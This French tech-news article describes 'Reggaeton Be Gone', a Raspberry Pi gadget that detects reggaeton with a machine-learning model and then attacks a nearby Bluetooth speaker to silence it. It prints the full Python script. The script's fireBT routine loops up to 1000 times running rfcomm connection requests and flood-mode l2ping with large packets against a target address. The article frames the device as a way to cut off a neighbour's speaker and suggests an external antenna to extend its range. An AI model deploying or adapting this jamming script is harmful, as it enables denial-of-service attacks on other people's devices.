« Reggaeton Be Gone (le nom est un hommage au dispositif Tv-B-Gone) surveille les émissions sonores dans la pièce, identifie le genre Reggaeton grâce à l'apprentissage automatique et déclenche des demandes de communication et des paquets vers le haut-parleur Bluetooth dans le but de le désactiver ou au moins de perturber le son à tel point que le voisin n'aura pas d'autre option que de l'éteindre », explique de façon brève Ron Bandini.
Ce dispositif de brouillage Bluetooth est animé par un Raspberry Pi 3 B+. Il est connecté à un écran OLED DFRobot avec une résolution de 128 x 32 pixels. Les émissions sonores sont captées à l'aide d'un microphone USB. Un bouton-poussoir permet de définir le moment où le système effectue une vérification pour détecter du raeggeton.
Le Raspberry Pi fonctionne sous Raspberry Pi OS. L'intelligence artificielle qui gère les aspects d'apprentissage automatique de la conception est Edge Impulse. Grâce à ce système, Bandini a pu entraîner le Pi à écouter de la musique et, plus précisément, à déterminer si la chanson jouée peut être classée comme reggaeton ou non.
Le code Python publié en open source sous licence MIT prend des échantillons audio et les envoie au modèle ML pour inférence. Si le score obtenu pour le genre reggaeton est supérieur au seuil, il déclenchera l'une des deux méthodes de connexion BT. L'une d'entre elles utilise rfconn et l'autre l2ping. Un fichier journal est enregistré et le fonctionnement de l'appareil est affiché sur un écran Oled.
|Code Rust :
|Sélectionner tout
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
#!/usr/bin/env python # -*- coding: utf-8 -*- # Reggaeton Be Gone # Roni Bandini @RoniBandini https://bandini.medium.com # February 2024 V 1.0 (Sucio y Desprolijo, as Pappo said) # MIT License (c) 2024 Roni Bandini # Disclaimer: this is an educational project. Use with your own BT speakers only. import os import subprocess import sys, getopt import signal import time import datetime from edge_impulse_linux.audio import AudioImpulseRunner from RPi import GPIO import Adafruit_GPIO.SPI as SPI import Adafruit_SSD1306 from PIL import Image from PIL import ImageDraw from PIL import ImageFont # Settings myPath="/home/pi/reggaeton/" selectedDeviceId = 1 method = 1 # 1 to 3 targetAddr = ":::::" packagesSize = 800 threadsCount = 1000 threshold = 0.95 myDelay = 0.1 forceFire = 0 model = "reggaetonbgone-linux-armv7-v4.eim" runner = None # Push button GPIO.setwarnings(False) GPIO.setmode(GPIO.BCM) buttonPin = 26 GPIO.setup(buttonPin, GPIO.IN, pull_up_down=GPIO.PUD_UP) # Oled screen RST = None DC = 23 SPI_PORT = 0 SPI_DEVICE = 0 disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST) disp.begin() disp.clear() disp.display() font = ImageFont.truetype('whitrabt.ttf', 12) width = disp.width height = disp.height image = Image.new('1', (width, height)) draw = ImageDraw.Draw(image) draw.rectangle((0,0,width,height), outline=0, fill=0) padding = -2 top = padding bottom = height-padding x = 0 # Speaker logo image = Image.open(myPath+'images/logo.png').convert('1') disp.image(image) disp.display() time.sleep(5) def writeLog(myLine): now = datetime.datetime.now() dtFormatted = now.strftime("%Y-%m-%d %H:%M:%S") with open('log.txt', 'a') as f: myLine=str(dtFormatted)+","+myLine f.write(myLine+"\n") def updateScreen(message1, message2): image = Image.new('1', (width, height)) draw = ImageDraw.Draw(image) draw.rectangle((0,0,width,height), outline=0, fill=0) padding = -2 x = 0 top = padding bottom = height-padding draw.text((x, top+4), "Reggaeton BeGone", font=font, fill=255) draw.text((x, top+16), message1, font=font, fill=255) draw.text((x, top+26), message2, font=font, fill=255) disp.image(image) disp.display() def fireBT(method, targetAddr, threadsCount, packagesSize, myDelay): writeLog("Firing with method #"+str(method)+ ", pkg "+ str(packagesSize) +', target ' + targetAddr) if method==1: # Small, are you there? for i in range(0, threadsCount): print('[*] ' + str(i + 1)) subprocess.call(['rfcomm', 'connect', targetAddr, '1']) time.sleep(myDelay) if method==2: # Medium, I think you should listen for i in range(0, threadsCount): print('[*] ' + str(i + 1)) os.system('l2ping -i hci0 -s ' + str(packagesSize) +' -f ' + targetAddr) time.sleep(myDelay) if method==3: # XXL, Say hello to my little friend for i in range(0, threadsCount): print('[*] Sorry, Scarface method is not included in this version ' + str(i + 1)) time.sleep(myDelay) def signal_handler(sig, frame): print('Interrupted') writeLog("Interrupted") if (runner): runner.stop() sys.exit(0) signal.signal(signal.SIGINT, signal_handler) def main(argv): dir_path = os.path.dirname(os.path.realpath(__file__)) modelfile = os.path.join(dir_path, model) print("") print("Reggaeton Be Gone 1.0") print("@RoniBandini, February 2024") print("Sounds are quite innoxious, or most distressing, by their sort rather than their quantity - Jane Austen") print("Waiting for button...") print("") print("") writeLog("Started") # Display updateScreen(targetAddr, "Method #"+str(method)) time.sleep(3) # Olmedo, No toca botón while GPIO.input(buttonPin) == GPIO.HIGH: time.sleep(1) writeLog("Listening") updateScreen(targetAddr, "Listening...") print("Listening...") with AudioImpulseRunner(modelfile) as runner: try: model_info = runner.init() labels = model_info['model_parameters']['labels'] print('Loaded AI-ML model "' + model_info['project']['owner'] + ' / ' + model_info['project']['name'] + '"') writeLog("AI model "+model_info['project']['name']) for res, audio in runner.classifier(device_id=selectedDeviceId): for label in labels: score = res['result']['classification'][label] if label=='reggaeton' and score<=threshold: print('%s: %.2f\t' % (label, score)) updateScreen("Is reggaeton?", str(round(score*100,2))+" %") if label=='reggaeton' and (score>threshold or forceFire==1): updateScreen("Firing speaker", "Score: "+ str(round(score*100,2))+" %" ) writeLog("Firing threshold: "+str(score)) time.sleep(4) image = Image.open(myPath+'images/logo.png').convert('1') disp.image(image) disp.display() fireBT(method, targetAddr, threadsCount, packagesSize, myDelay) print('') finally: if (runner): runner.stop() if __name__ == '__main__': main(sys.argv[1:])
Le dispositif dans sa forme telle que mise en avant par Ron Bandini exhibe un inconvénient majeur : sa portée nest pas importante et donc la distance avec le haut-parleur à perturber ne doit pas être importante. Cest la raison pour laquelle il conseille de se doter dune carte bluetooth externe avec antenne pour en étendre la portée.
Source : Ron Bandini
Et vous ?
Avez-vous déjà mis un dispositif similaire sur pied ? Si oui, quels sont les aspects logiciels de ce projet dont la revue permettraient de l'améliorer ?